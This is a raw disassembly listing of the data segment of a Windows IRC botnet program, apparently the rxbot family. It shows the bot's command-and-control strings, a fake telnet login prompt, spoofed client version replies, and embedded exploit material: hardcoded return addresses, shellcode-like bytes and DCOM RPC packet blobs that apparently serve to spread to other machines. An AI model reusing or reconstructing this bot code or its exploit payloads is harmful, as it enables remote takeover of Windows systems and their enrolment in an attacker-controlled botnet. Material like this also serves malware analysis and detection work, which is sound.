align 4
dword_413364 dd 5C3A41h ; DATA XREF: sub_406096+6�r
; sub_406110+60�r ...
dword_413368 dd 6F547325h, 206C6174h, 76697264h, 203A7365h, 2343003h
; DATA XREF: sub_406110+1A2�o
dd 2037525h, 6F54202Ch, 206C6174h, 63617073h, 3203A65h
dd 25023430h, 4D020375h, 72662042h, 2E6565h
dword_4133A0 dd 30037325h, 73250234h, 73250203h, 0 ; DATA XREF: sub_406110+15A�o
dword_4133B0 dd 30037325h, 73250234h, 73250203h, 34300320h, 3752502h
; DATA XREF: sub_406110+13B�o
dd 20424D02h, 65657266h, 0
aUnknown db 'unknown',0 ; DATA XREF: sub_406110+FA�o
; sub_40DA07+36�o
aRamdisk db 'ramdisk',0 ; DATA XREF: sub_406110+F3�o
aCdRom db 'cd-rom',0 ; DATA XREF: sub_406110+E9�o
align 4
aRemote db 'remote',0 ; DATA XREF: sub_406110+DD�o
align 10h
aFixed db 'fixed',0 ; DATA XREF: sub_406110+D1�o
align 4
a_ db '. ',0 ; DATA XREF: sub_406110+BD�o
; sub_406110+184�o
align 4
aRemovable db 'removable',0 ; DATA XREF: sub_406110+88�o
align 4
aDriveInformati db 'Drive information - ',0 ; DATA XREF: sub_406110+2B�o
align 10h
aDriveinfoThrea db 'Driveinfo thread',0 ; DATA XREF: sub_4062EC+21�o
align 4
aThread db 'thread',0 ; DATA XREF: sub_4064A0+76�o
; sub_406596+7B�o
align 4
aBtg db 'btg',0 ; DATA XREF: sub_4064A0+71�o
dword_413440 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_4064A0+54�o
aBtgTriedExecut db '- btg tried executing an unreadable address. (%08X)',0
aS db '*%s*',0 ; DATA XREF: sub_40678D+60�o
; sub_406868+86�o
align 4
dword_413488 dd 3430032Dh, 2037802h ; DATA XREF: sub_406993+DA�o
aNoThreadsRunni db '- No threads running.',0
align 4
dword_4134A8 dd 2343003h, 2036925h, 7325202Eh, 0 ; DATA XREF: sub_406993+9C�o
dword_4134B8 dd 3430032Dh, 2037802h, 694C202Dh, 6E697473h, 30032067h
; DATA XREF: sub_406993+40�o
dd 69250234h, 32F0203h, 25023430h, 20020369h, 65726874h
dd 3A736461h, 0
aCouldNotGetAVa db 'Could not get a valid ICMP handle',0Ah,0 ; DATA XREF: sub_406B1B+14�o
align 4
dword_41350C dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_406BE0+260�o
dd 736D6425h, 34300320h, 2E642502h, 252E6425h, 64252E64h
dd 203h
dword_413538 dd 2343003h, 2036425h, 2020202Eh, 3 dup(2020202Ah), 6F727245h
; DATA XREF: sub_406BE0+203�o
dd 30033A72h, 64250234h, 203h
dword_413560 dd 2343003h, 2036425h, 6425202Eh, 2520736Dh, 20736D64h
; DATA XREF: sub_406BE0+1DC�o
dd 736D6425h, 34300320h, 3732502h, 25282002h, 64252E64h
dd 2E64252Eh, 296425h
aCouldNotResolv db 'Could not resolve name',0 ; DATA XREF: sub_406BE0:loc_406D4A�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_406BE0+6D�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_406BE0+5B�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_406BE0+53�o
align 4
aIcmp_dll db 'ICMP.DLL',0 ; DATA XREF: sub_406BE0+35�o
align 4
unk_4135E4 db 55h ; U ; DATA XREF: sub_406E50+D�o
db 73h, 61h, 67h
db 65h ; e
db 3Ah, 20h, 3
db 30h ; 0
db 34h, 2, 74h
db 72h ; r
db 61h, 63h, 65h
db 3
db 2, 20h, 3Ch
db 3
db 30h, 34h, 2
db 68h ; h
db 6Fh, 73h, 74h
db 3
db 2, 3Eh, 20h
aHopcountTimeou db '[<hopcount> <timeout> <pingcount>]',0
align 4
dword_413628 dd 202h ; DATA XREF: sub_406F40+F8�o
dword_41362C dd 0A0D7325h, 0 ; DATA XREF: sub_406F40+5F�o
dword_413634 dd 3334h ; DATA XREF: sub_406F40+3A�o
dword_413638 dd 3430032Dh, 3752502h, 51202D02h, 79726575h, 20676E69h
; DATA XREF: sub_406F40+28�o
dd 2343003h, 2037325h, 726F6620h, 34300320h, 3732502h
dd 3A02h
dword_413664 dd 6F727245h, 75712072h, 69797265h, 320676Eh, 25023430h
; DATA XREF: sub_40708B+45�o
dd 2E020373h, 0
dword_413680 dd 72657551h, 676E6979h, 34300320h, 3732502h, 6F662002h
; DATA XREF: sub_4070F0+7F�o
dd 30032072h, 73250234h, 203h
dword_4136A0 dd 0DB86ACE1h, 0D38ED2DBh, 0F7D9E2CDh, 0F493h, 0 ; DATA XREF: sub_4070F0+4D�o
aAbcdef db 'abcdef',0 ; DATA XREF: sub_407290+9�o
align 4
aQuitChangingSe db 'QUIT :changing server',0 ; DATA XREF: sub_40735A:loc_408384�o
align 4
dword_4136D4 dd 6B6E696Ch, 30037620h, 64250234h, 32E0203h, 25023430h
; DATA XREF: sub_40735A+101A�o
dd 3643330h, 20732502h, 6E69575Bh, 5D3233h
dword_4136F8 dd 69747055h, 2D20656Dh, 73795320h, 3A6D6574h, 34300320h
; DATA XREF: sub_40735A+FD3�o
dd 3642502h, 79616402h, 3207325h, 25023430h, 68020364h
dd 2572756Fh, 30032073h, 64250234h, 696D0203h, 6574756Eh
dd 202E7325h, 3A435249h, 34300320h, 3642502h, 79616402h
dd 3207325h, 25023430h, 68020364h, 2572756Fh, 30032073h
dd 64250234h, 696D0203h, 6574756Eh, 7325h
aUsername db 'username',0 ; DATA XREF: sub_40735A:loc_408206�o
align 4
aId db 'id',0 ; DATA XREF: sub_40735A+E8B�o
align 4
dword_41377C dd 27CE0h ; DATA XREF: sub_40735A+E67�r
dd 0
dword_413784 dd 4F47DA0h ; DATA XREF: sub_40735A+E5F�r
align 10h
dword_413790 dd 4EA8h ; DATA XREF: sub_40735A:loc_4081B1�r
align 8
dword_413798 dd 25575D8h ; DATA XREF: sub_40735A:loc_408198�r
dd 2 dup(0)
a9252 db '9252',0 ; DATA XREF: sub_40735A+E08�o
align 4
dword_4137AC dd 40ACA2A1h ; DATA XREF: sub_40735A+DFF�r
dd 3 dup(0)
dword_4137BC dd 23013A08h ; DATA XREF: sub_40735A+DF3�r
dd 2 dup(0)
dword_4137C8 dd 22EE0h ; DATA XREF: sub_40735A+DE7�r
align 10h
dword_4137D0 dd 2884BA08h ; DATA XREF: sub_40735A+DDB�r
dd 2 dup(0)
dword_4137DC dd 28718h ; DATA XREF: sub_40735A:loc_408129�r
dd 0
dword_4137E4 dd 234F9EA0h ; DATA XREF: sub_40735A+DAA�r
align 10h
dword_4137F0 dd 2675EFE0h ; DATA XREF: sub_40735A+D9E�r
dd 2 dup(0)
dword_4137FC dd 26620h ; DATA XREF: sub_40735A:loc_4080EC�r
dd 0
dword_413804 dd 65657053h, 3203A64h, 25023430h, 4B020375h, 65732F42h
; DATA XREF: sub_40735A+D88�o
dd 63h
dword_41381C dd 9F2E60h ; DATA XREF: sub_40735A:loc_408028�r
dd 2 dup(0)
dword_413828 dd 2343003h, 2037325h ; DATA XREF: sub_40735A+CC4�o
aHasNoIpv4End_ db ' has no ipv4 end.',0
align 4
dword_413844 dd 20656854h, 34767069h, 646E6520h, 20666F20h, 2343003h
; DATA XREF: sub_40735A+CAE�o
dd 2037325h, 20736920h, 2343003h, 252E6925h, 69252E69h
dd 369252Eh, 2
a2002 db '2002',0 ; DATA XREF: sub_40735A+C1E�o
; .data:0041588C�o
align 4
dword_41387C dd 14CFC06Dh ; DATA XREF: sub_40735A:loc_407F45�r
dd 3 dup(0)
dword_41388C dd 6F727245h, 65722072h, 766C6F73h, 20676E69h, 2343003h
; DATA XREF: sub_40735A+BE1�o
dd 2037325h, 2Eh
dword_4138A8 dd 2343003h, 2037325h, 44202D20h, 203A534Eh, 2343003h
; DATA XREF: sub_40735A+BCE�o
dd 2037325h, 0
dword_4138C4 dd 135DD8h ; DATA XREF: sub_40735A:loc_407EBF�r
align 10h
dword_4138D0 dd 2343003h, 2037325h, 55202D20h, 6F6E6B6Eh, 74206E77h
; DATA XREF: sub_40735A+B31�o
db 79h, 70h
word_4138E6 dw 2065h ; DATA XREF: start+125�w start+188�r
db 3, 30h
word_4138EA dw 234h ; DATA XREF: sub_41910B+E�r start+12E�w
db 25h, 64h
dw 203h ; DATA XREF: start+140�w
db 20h, 61h
dw 6464h ; DATA XREF: start+137�w
db 72h, 65h
dword_4138F6 dd 203A7373h ; DATA XREF: start+149�w
dword_4138FA dd 2343003h ; DATA XREF: start+FC�r start+108�w ...
dw 7325h
dd 203h
byte_413904 db 3, 30h ; DATA XREF: sub_40735A+B12�o
dw 234h ; DATA XREF: start+161�r
dd 2037325h, 49202D20h, 20367650h
db 61h, 64h
dw 7264h ; DATA XREF: start+14F�r start+15B�r
dd 3A737365h, 34300320h, 3732502h, 2
dword_413928 dd 2343003h, 2037325h, 49202D20h, 20347650h, 72646461h
; DATA XREF: sub_40735A+AE3�o
dd 3A737365h, 34300320h, 3732502h, 2
dword_41394C dd 3Ch ; DATA XREF: sub_40735A+AD6�o
; sub_40735A+B05�o ...
dword_413950 dd 11DD8h ; DATA XREF: sub_40735A+A59�r
align 8
dword_413958 dd 4F4F9EAAh ; DATA XREF: sub_40735A+A4D�r
dd 3 dup(0)
dword_413968 dd 506A620h ; DATA XREF: sub_40735A:loc_407D9B�r
dd 2 dup(0)
dword_413974 dd 4C28h ; DATA XREF: sub_40735A+A22�r
dd 0
dword_41397C dd 987988h ; DATA XREF: sub_40735A+A16�r
dd 2 dup(0)
dword_413988 dd 22CA0h ; DATA XREF: sub_40735A:loc_407D64�r
align 10h
dword_413990 dd 0FA869B91h ; DATA XREF: sub_40735A:loc_407D52�r
align 10h
dword_4139A0 dd 72616843h, 65746361h, 6E692072h, 68202D20h, 203A7865h
; DATA XREF: sub_40735A+9E2�o
dd 2343003h, 30257830h, 2035832h, 63656420h, 3003203Ah
dd 75250234h, 2E0203h
dword_4139D0 dd 11F060h ; DATA XREF: sub_40735A:loc_407D24�r
dd 2 dup(0)
dword_4139DC dd 2946A6E0h ; DATA XREF: sub_40735A+975�r
dd 2 dup(0)
dword_4139E8 dd 124A0h ; DATA XREF: sub_40735A+969�r
align 10h
dword_4139F0 dd 123C20h ; DATA XREF: sub_40735A+95D�r
dd 2 dup(0)
dword_4139FC dd 0C5020h ; DATA XREF: sub_40735A:loc_407CAB�r
dd 2 dup(0)
dword_413A08 dd 45444F4Dh, 732520h ; DATA XREF: sub_40735A+947�o
dword_413A10 dd 5A560h ; DATA XREF: sub_40735A:loc_407C89�r
dd 2 dup(0)
dword_413A1C dd 1547A5B4h ; DATA XREF: sub_40735A:loc_407C70�r
dd 3 dup(0)
aDebugModeIsS_ db 'Debug mode is %s.',0 ; DATA XREF: sub_40735A+8F0�o
align 10h
aOff db 'off',0 ; DATA XREF: sub_40735A+8EA�o
aOn db 'on',0 ; DATA XREF: sub_40735A+8E3�o
; sub_40735A:loc_407C54�o
align 4
dword_413A48 dd 493350h ; DATA XREF: sub_40735A:loc_407C26�r
dd 2 dup(0)
dword_413A54 dd 27010h ; DATA XREF: sub_40735A:loc_407C0A�r
dd 0
dword_413A5C dd 406AD20h ; DATA XREF: sub_40735A:loc_407BDB�r
dd 2 dup(0)
dword_413A68 dd 0E510h ; DATA XREF: sub_40735A:loc_407BAC�r
align 10h
dword_413A70 dd 9E72A8h ; DATA XREF: sub_40735A:loc_407B7B�r
dd 2 dup(0)
dword_413A7C dd 54524150h, 732520h ; DATA XREF: sub_40735A+817�o
dword_413A84 dd 10B6E0h ; DATA XREF: sub_40735A:loc_407B5D�r
align 10h
dword_413A90 dd 154DE0h ; DATA XREF: sub_40735A:loc_407B38�r
dd 2 dup(0)
dword_413A9C dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40735A:loc_407B29�o
; sub_408F9D+44D�o
dword_413AA8 dd 635E0h ; DATA XREF: sub_40735A:loc_407AEA�r
dd 2 dup(0)
aQuitSRemoved_ db 'QUIT :%s removed.',0 ; DATA XREF: sub_40735A+77A�o
align 4
dword_413AC8 dd 51BCDA0h ; DATA XREF: sub_40735A:loc_407AC7�r
dd 2 dup(0)
dword_413AD4 dd 569F18h ; DATA XREF: sub_40735A:loc_407AA8�r
align 10h
dword_413AE0 dd 51A520h ; DATA XREF: sub_40735A:loc_407A83�r
dd 2 dup(0)
dword_413AEC dd 87AA0569h ; DATA XREF: sub_40735A:loc_407A67�r
dd 3 dup(0)
dword_413AFC dd 29097EA0h ; DATA XREF: sub_40735A:loc_407A48�r
; start+D8�r ...
db 2 dup(0)
dword_413B02 dd 0 ; DATA XREF: start+174�r
align 4
dword_413B08 dd 124D0165h ; DATA XREF: sub_40735A:loc_407A33�r
dd 3 dup(0)
dword_413B18 dd 48CCA60h ; DATA XREF: sub_40735A:loc_407A17�r
dd 2 dup(0)
dword_413B24 dd 0A3388h ; DATA XREF: sub_40735A:loc_407A02�r
align 10h
dword_413B30 dd 74736F48h, 72646441h, 3003203Ah, 73250234h, 203h
; DATA XREF: sub_40735A+684�o
dword_413B44 dd 99D3CC20h ; DATA XREF: sub_40735A:loc_4079CA�r
dd 3 dup(0)
dword_413B54 dd 65736162h, 64203436h, 646F6365h, 203A6465h, 2343003h
; DATA XREF: sub_40735A+65A�o
dd 2037325h, 0
dword_413B70 dd 492620h ; DATA XREF: sub_40735A:loc_40796F�r
dd 2 dup(0)
aItTookMeUms_ db 'It took me %ums.',0 ; DATA XREF: sub_40735A+60E�o
align 10h
dword_413B90 dd 65736162h, 65203436h, 646F636Eh, 203A6465h, 2343003h
; DATA XREF: sub_40735A+5BA�o
dd 2037325h, 0
dword_413BAC dd 26620h ; DATA XREF: sub_40735A:loc_4078C2�r
dd 0
dword_413BB4 dd 501F0E1h ; DATA XREF: sub_40735A:loc_407897�r
dd 3 dup(0)
dword_413BC4 dd 2C1B10D5h ; DATA XREF: sub_40735A:loc_40784B�r
dd 4 dup(0)
dword_413BD8 dd 239059D9h ; DATA XREF: sub_40735A+4D8�r
dd 3 dup(0)
dword_413BE8 dd 13F0E0h ; DATA XREF: sub_40735A+4CC�r
dd 2 dup(0)
dword_413BF4 dd 13EA70E0h ; DATA XREF: sub_40735A+4C0�r
align 10h
dword_413C00 dd 4D270E0h ; DATA XREF: sub_40735A:loc_40780E�r
dd 2 dup(0)
dword_413C0C dd 24720A20h ; DATA XREF: sub_40735A:loc_4077EF�r
dd 2 dup(0)
dword_413C18 dd 203A5049h, 2343003h, 2037325h, 0 ; DATA XREF: sub_40735A+48B�o
dword_413C28 dd 4BE8h ; DATA XREF: sub_40735A:loc_4077D8�r
align 10h
dword_413C30 dd 124BFDD8h ; DATA XREF: sub_40735A:loc_4077BF�r
dd 2 dup(0)
dword_413C3C dd 24343260h ; DATA XREF: sub_40735A:loc_4077B4�r
dd 2 dup(0)
dword_413C48 dd 242C3388h ; DATA XREF: sub_40735A:loc_407793�r
dd 2 dup(0)
dword_413C54 dd 379D822Ah ; DATA XREF: sub_40735A:loc_40777B�r
dd 3 dup(0)
dword_413C64 dd 379DCF5Ah ; DATA XREF: sub_40735A:loc_407748�r
dd 3 dup(0)
dword_413C74 dd 390F2B3Eh ; DATA XREF: sub_40735A:loc_407726�r
dd 3 dup(0)
dword_413C84 dd 1B7DFEA1h ; DATA XREF: sub_40735A:loc_407704�r
dd 3 dup(0)
dword_413C94 dd 140860h ; DATA XREF: sub_40735A:loc_4076E2�r
align 10h
dword_413CA0 dd 7A1168A0h ; DATA XREF: sub_40735A+369�r
align 10h
dword_413CB0 dd 0E88DCA0h ; DATA XREF: sub_40735A+35D�r
dd 2 dup(0)
dword_413CBC dd 74358h ; DATA XREF: sub_40735A:loc_4076AB�r
dd 2 dup(0)
dword_413CC8 dd 1234A0h ; DATA XREF: sub_40735A:loc_407687�r
dd 2 dup(0)
dword_413CD4 dd 1CEC4829h ; DATA XREF: sub_40735A:loc_40766E�r
dd 3 dup(0)
dword_413CE4 dd 0A9EB0560h ; DATA XREF: sub_40735A:loc_40761E�r
dd 3 dup(0)
dword_413CF4 dd 1B7A7CA1h ; DATA XREF: sub_40735A:loc_407605�r
dd 3 dup(0)
dword_413D04 dd 1B73B389h ; DATA XREF: sub_40735A:loc_4075E9�r
dd 3 dup(0)
dword_413D14 dd 38323166h, 2B636E65h, 20626166h, 72636564h, 65747079h
; DATA XREF: sub_40735A+285�o
dd 3203A64h, 25023430h, 20373h
dword_413D34 dd 124A4320h ; DATA XREF: sub_40735A:loc_40754B�r
align 10h
dword_413D40 dd 38323166h, 2B636E65h, 20626166h, 72636E65h, 65747079h
; DATA XREF: sub_40735A+1E7�o
dd 3D203A64h, 2343003h, 2037325h, 0
dword_413D64 dd 232320h ; DATA XREF: sub_40735A+168�o
dword_413D68 dd 25EA4320h ; DATA XREF: sub_40735A:loc_407477�r
dd 2 dup(0)
dword_413D74 dd 954E18h ; DATA XREF: sub_40735A:loc_407458�r
align 10h
dword_413D80 dd 72727543h, 20746E65h, 646E6977h, 203A776Fh, 2343003h
; DATA XREF: sub_40735A+F4�o
dd 2037325h, 0
dword_413D9C dd 2C3ADA0h ; DATA XREF: sub_40735A:loc_40741E�r
dd 2 dup(0)
dword_413DA8 dd 4B43494Eh, 732520h ; DATA XREF: sub_40735A:loc_407403�o
; sub_4088FC+F0�o ...
dword_413DB0 dd 11A8A8h ; DATA XREF: sub_40735A:loc_4073D0�r
dd 2 dup(0)
dword_413DBC dd 35721361h ; DATA XREF: sub_40735A+57�r
dd 3 dup(0)
aLinkLink@linkP db 'link!link@link PRIVMSG %s :%s',0 ; DATA XREF: sub_408406+53�o
; sub_408F9D+631�o
align 4
asc_413DEC: ; DATA XREF: sub_408406+29�o
unicode 0, <;>,0
asc_413DF0 db '<=',0 ; DATA XREF: sub_40849F+2F2�o
align 4
asc_413DF4 db '>=',0 ; DATA XREF: sub_40849F+2C2�o
align 4
asc_413DF8: ; DATA XREF: sub_40849F+2AA�o
dw 3Eh
unicode 0, <>,0
asc_413DFC db '!=',0 ; DATA XREF: sub_40849F+28E�o
align 10h
asc_413E00 db '==',0 ; DATA XREF: sub_40849F+272�o
align 4
aIpv6 db '$ipv6',0 ; DATA XREF: sub_40849F+181�o
; sub_40849F+253�o
align 4
aFirewall db '$firewall',0 ; DATA XREF: sub_40849F+166�o
; sub_40849F+238�o
align 4
aLatency db '$latency',0 ; DATA XREF: sub_40849F+14B�o
; sub_40849F+21D�o
align 4
aFree_0 db '$free',0 ; DATA XREF: sub_40849F+130�o
; sub_40849F+202�o
align 4
aVersion db '$version',0 ; DATA XREF: sub_40849F+115�o
; sub_40849F+1E7�o
align 4
aUptime db '$uptime',0 ; DATA XREF: sub_40849F+EE�o
; sub_40849F+1C0�o
a32s16s32s db '%32s %16s %32s',0 ; DATA XREF: sub_40849F+9C�o
align 10h
asc_413E50 db '&&',0 ; DATA XREF: sub_40849F+6A�o
align 4
asc_413E54: ; DATA XREF: sub_40849F+21�o
unicode 0, <)>,0
aExecutingComma db 'Executing command(s): %s',0 ; DATA XREF: sub_4087CE+46�o
align 4
a6667 db '6667',0 ; DATA XREF: sub_408832:loc_40885D�o
align 4
aCSCCUCUSCCC db '%c%s%c%c%u%c%u%s%c%c%c',0 ; DATA XREF: sub_4088FC+230�o
; sub_408F9D+384�o
align 4
aG: ; DATA XREF: sub_4088FC+1AF�o
; sub_408F9D+303�o
unicode 0, <G>,0
aA: ; DATA XREF: sub_4088FC+1A3�o
; sub_408F9D+2F7�o
unicode 0, <A>,0
aB: ; DATA XREF: sub_4088FC+19C�o
; sub_408F9D+2F0�o
unicode 0, <B>,0
aUnk db 'UNK',0 ; DATA XREF: sub_4088FC+167�o
; sub_408F9D+2BC�o
aUserSSSS db 'USER %s %s %s :%s',0 ; DATA XREF: sub_4088FC+C7�o
align 4
aPassS db 'PASS %s',0 ; DATA XREF: sub_4088FC+3D�o
aNoticeS db 'NOTICE %s :',0 ; DATA XREF: sub_408C6C+16�o
; sub_408D50+2E�o
aPrivmsgS db 'PRIVMSG %s :',0 ; DATA XREF: sub_408CDE+16�o
; sub_408D50:loc_408DA5�o
align 4
dword_413EDC dd 1 ; DATA XREF: sub_408D50+CD�o
dword_413EE0 dd 7373656Dh, 20656761h, 0 ; DATA XREF: sub_408D50+8A�o
dword_413EEC dd 49544F4Eh, 25204543h, 13A2073h, 0 ; DATA XREF: sub_408D50+4E�o
dword_413EFC dd 56495250h, 2047534Dh, 3A207325h, 1 ; DATA XREF: sub_408D50+3E�o
aMirc db 'mIRC',0 ; DATA XREF: sub_408EBA+2�o
; sub_408EC8+1C�o
align 4
asc_413F14: ; DATA XREF: sub_408F9D+890�o
unicode 0, <*>,0
aNotice db 'NOTICE',0 ; DATA XREF: sub_408F9D:loc_40966C�o
; sub_4098BB+70�o
align 10h
asc_413F20 db '][',0 ; DATA XREF: sub_408F9D+607�o
align 4
a332 db '332',0 ; DATA XREF: sub_408F9D:loc_409513�o
aNick db 'NICK',0 ; DATA XREF: sub_408F9D:loc_4094D9�o
align 10h
a@: ; DATA XREF: sub_408F9D+4E4�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_408F9D:loc_409463�o
; sub_4098BB+2F�o
a451 db '451',0 ; DATA XREF: sub_408F9D:loc_409446�o
aUserhostS db 'USERHOST %s',0 ; DATA XREF: sub_408F9D+487�o
aModeSXi db 'MODE %s +xi',0 ; DATA XREF: sub_408F9D+437�o
a001 db '001',0 ; DATA XREF: sub_408F9D:loc_40939E�o
aModeSSmntu db 'MODE %s +smntu',0 ; DATA XREF: sub_408F9D+3F7�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_408F9D:loc_40935F�o
align 10h
aError db 'ERROR',0 ; DATA XREF: sub_408F9D:loc_409340�o
align 4
a433 db '433',0 ; DATA XREF: sub_408F9D:loc_4091DC�o
dword_413F7C dd 52455601h, 4E4F4953h, 1732520h, 0 ; DATA XREF: sub_408F9D+22B�o
aEggdropV1_6_16 db 'eggdrop v1.6.16',0 ; DATA XREF: sub_408F9D:loc_4091C3�o
dword_413F9C dd 52455601h, 4E4F4953h, 6E696C20h, 2576206Bh, 30252E64h
; DATA XREF: sub_408F9D+211�o
dd 73256433h, 69572820h, 2932336Eh, 1
dword_413FC0 dd 4950013Ah, 1474Eh ; DATA XREF: sub_408F9D+1DA�o
dword_413FC8 dd 4950013Ah, 474Eh ; DATA XREF: sub_408F9D+1C7�o
dword_413FD0 dd 4556013Ah, 4F495352h, 14Eh ; DATA XREF: sub_408F9D+1B4�o
dword_413FDC dd 4556013Ah, 4F495352h, 4Eh ; DATA XREF: sub_408F9D:loc_40913E�o
aSend db 'SEND',0 ; DATA XREF: sub_408F9D+AF�o
align 10h
dword_413FF0 dd 4344013Ah, 43h ; DATA XREF: sub_408F9D+8F�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_408F9D+61�o
; sub_408F9D+69E�o ...
aMode db 'MODE',0 ; DATA XREF: sub_408F9D+4A�o
align 4
aPong db 'PONG',0 ; DATA XREF: sub_408F9D:loc_408FD0�o
align 10h
aPongS db 'PONG %s',0 ; DATA XREF: sub_408F9D+24�o
aPing db 'PING',0 ; DATA XREF: sub_408F9D+F�o
align 10h
aLinkLink@link db 'link!link@link',0 ; DATA XREF: sub_4098BB:loc_4099B0�o
align 10h
byte_414030 db 41h ; DATA XREF: sub_409AB1:loc_409ABF�r
; sub_409B9F+15�r ...
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
unk_414074 db 2Dh ; - ; DATA XREF: sub_40AC87+8E�o
; sub_40DA07+52�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 2Eh, 3, 30h
db 34h ; 4
db 2, 25h, 73h
db 3
db 2, 2Dh, 20h
aU_RawTransferT db '%u. Raw transfer to %s complete.',0
align 4
aTelnet db 'telnet',0 ; DATA XREF: sub_40AC87+88�o
align 4
aUserAccessVeri db 0Dh,0Ah ; DATA XREF: sub_40AC87+66�o
db 0Dh,0Ah
db 'User Access Verification',0Dh,0Ah
db 0Dh,0Ah
db 'Password:',0
align 10h
dword_4140E0 dd 0FF01FBFFh, 0FDFF03FBh, 1FFDFF18h, 0 ; DATA XREF: sub_40AC87+37�o
dword_4140F0 dd 1130h, 0 ; DATA XREF: sub_40AD2B+51�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dword_41411C dd 77777777h ; DATA XREF: sub_40AE3D+157�r
dd 77777776h, 77777775h, 77F326C6h, 77F29267h, 77777772h
dd 77F9D463h
dword_414138 dd 750362C3h ; DATA XREF: sub_40AE3D+169�r
dd 75035173h, 3 dup(717564B8h)
dword_41414C dd 71AB7BFBh ; DATA XREF: sub_40AE3D+17B�r
dd 773AD507h, 7C941EEDh
dword_414158 dd 77DB565Ch ; DATA XREF: sub_40AE3D:loc_40AFC1�r
dd 77FD1F89h, 2 dup(77E216B8h)
; ---------------------------------------------------------------------------
loc_414168: ; DATA XREF: sub_40AE3D+140�o
; seg000:0040B1F3�o
jmp short loc_41416E
; ---------------------------------------------------------------------------
align 4
loc_41416C: ; DATA XREF: sub_40AE3D+11F�o
xor ebp, [esi]
loc_41416E: ; CODE XREF: .data:loc_414168�j
aaa
xor ch, [esi]
xor [esi], ch
xor [eax], al
; ---------------------------------------------------------------------------
db 3 dup(0)
a131_131_131_13 db '131.131.131.131',0 ; DATA XREF: sub_40AE3D+114�o
aRxbot_paradise db 'rxbot_paradise',0 ; DATA XREF: sub_40AE3D+101�o
align 4
a121204131313 db '12/12/04 13:13:13',0 ; DATA XREF: sub_40AE3D+EE�o
align 4
aRxbotWasHere db 'rxbot was here',0 ; DATA XREF: sub_40AE3D+D8�o
align 4
aRxbot db 'rxbot',0 ; DATA XREF: sub_40AE3D+C5�o
align 4
dword_4141C4 dd 2710h ; DATA XREF: sub_40AE3D+88�o
; seg000:0040B1A4�o
dword_4141C8 dd 1130h, 0 ; DATA XREF: sub_40B00A+51�o
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0F5h, 28h, 5Ch
dd 400DC28Fh, 5 dup(0)
dd 1, 0
dword_4141F4 dd 0FFCA8166h, 6A52420Fh, 2ECD5802h, 745A053Ch, 5E21B8EFh
; DATA XREF: seg000:0040B1E0�o
dd 0FA8B4A9Dh, 0AFEA75AFh, 0E7FFE775h, 0
dword_414218 dd 2 dup(4A9D5E21h), 0 ; DATA XREF: seg000:0040B1B7�o
dword_414224 dd 77777777h ; DATA XREF: seg000:0040B209�r
dd 77777776h, 77777775h, 77F326C6h, 77F29267h, 77777772h
dd 77F32836h
dword_414240 dd 750362C3h ; DATA XREF: seg000:0040B21A�r
dd 75035173h, 3 dup(7C2FA0F7h)
dword_414254 dd 71AB7BFBh ; DATA XREF: seg000:0040B22B�r
dd 71AB7BFBh, 7C941EEDh
dword_414260 dd 77E216B8h ; DATA XREF: seg000:loc_40B234�r
dd 77FD1F89h, 2 dup(77E216B8h)
dword_414270 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: sub_40B27D+38�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40B32A+94�o
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
align 10h
dword_4142F0 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40B32A+6C�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
